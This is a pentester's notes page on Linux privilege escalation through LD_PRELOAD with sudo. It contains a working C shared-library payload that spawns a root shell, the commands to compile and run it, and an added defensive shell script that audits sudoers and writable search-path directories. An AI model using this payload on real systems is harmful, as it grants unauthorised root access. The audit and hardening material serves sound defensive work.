xct's notes
Path Hijacking

LD_PRELOAD

Check whether you can write into any directory on the library search path (or the PATH) used by privileged binaries; if so, you may be able to abuse the library load order. Check which functions a binary imports from shared libraries with objdump -T (the dynamic symbol table). For these preload attacks to work through sudo, /etc/sudoers must contain env_keep += LD_PRELOAD, since sudo otherwise strips LD_PRELOAD from the environment.

Preload example payload (payload.c)

#include <stdio.h>
#include <stdlib.h>      /* unsetenv, system */
#include <sys/types.h>
#include <unistd.h>      /* setgid, setuid */

/* Runs when the library is loaded; -nostartfiles lets us define _init ourselves. */
void _init() {
    unsetenv("LD_PRELOAD");   /* stop the spawned shell from preloading this library again */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

Compile the preload example payload and run it through sudo

gcc -fPIC -shared -o payload.so payload.c -nostartfiles
sudo LD_PRELOAD=/tmp/payload.so <target>
When changing the linker configuration (/etc/ld.so.conf, /etc/ld.so.conf.d/*), run ldconfig afterwards, or the linker cache (/etc/ld.so.cache) won't be updated and the new search path is not picked up.
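The two preconditions described in these notes, LD_PRELOAD surviving sudo via env_keep and a writable directory on a privileged binary's search path, are easy to audit. The helper below is an added example (not xct's code) that checks both; the sudoers file path and the colon-separated directory list are passed in explicitly, so it runs offline against constructed data and can equally be pointed at /etc/sudoers, $PATH, or the directories listed in /etc/ld.so.conf and /etc/ld.so.conf.d/*.

```shell
#!/bin/sh
# Added audit helper for the two conditions described in the notes above.
# Not part of xct's notes; inputs are explicit so it runs offline.

# Succeed (exit 0) if the sudoers file in $1 preserves LD_PRELOAD through
# env_keep, which is the precondition for the sudo preload trick.
sudoers_keeps_ld_preload() {
    grep -Eq '^[[:space:]]*Defaults.*env_keep[[:space:]]*\+?=.*LD_PRELOAD' "$1"
}

# Print every existing directory in the colon-separated list $1 that the
# current user can write to. Feed it PATH, or the directories collected from
# /etc/ld.so.conf and /etc/ld.so.conf.d/*, to see which entries this
# account could plant a library or binary in.
writable_dirs_in() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        if [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ]; then
            printf '%s\n' "$d"
        fi
    done
}

# Number of writable directories in $1, for a simple pass/fail threshold.
count_writable_dirs_in() {
    writable_dirs_in "$1" | wc -l | tr -d ' '
}

# Demo on constructed data: a temporary sudoers copy containing the weak
# env_keep line, and a writable temp directory next to one that does not exist.
demo_audit() {
    tmpdir=$(mktemp -d)
    printf 'Defaults env_reset\nDefaults env_keep += LD_PRELOAD\n' > "$tmpdir/sudoers"
    if sudoers_keeps_ld_preload "$tmpdir/sudoers"; then
        echo "sudoers: LD_PRELOAD is kept by env_keep (remove it)"
    else
        echo "sudoers: LD_PRELOAD is not kept"
    fi
    echo "writable search-path directories:"
    writable_dirs_in "$tmpdir:/nonexistent-dir-for-demo"
    rm -rf "$tmpdir"
}
```

On a live host, run `sudoers_keeps_ld_preload /etc/sudoers` (the file is root-readable only) and `writable_dirs_in "$PATH"` as the unprivileged account in question. Any hit means the hardening is straightforward: drop LD_PRELOAD from env_keep, and make every search-path directory root-owned and not group- or world-writable, then run ldconfig if the linker configuration changed.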
Last modified 1yr ago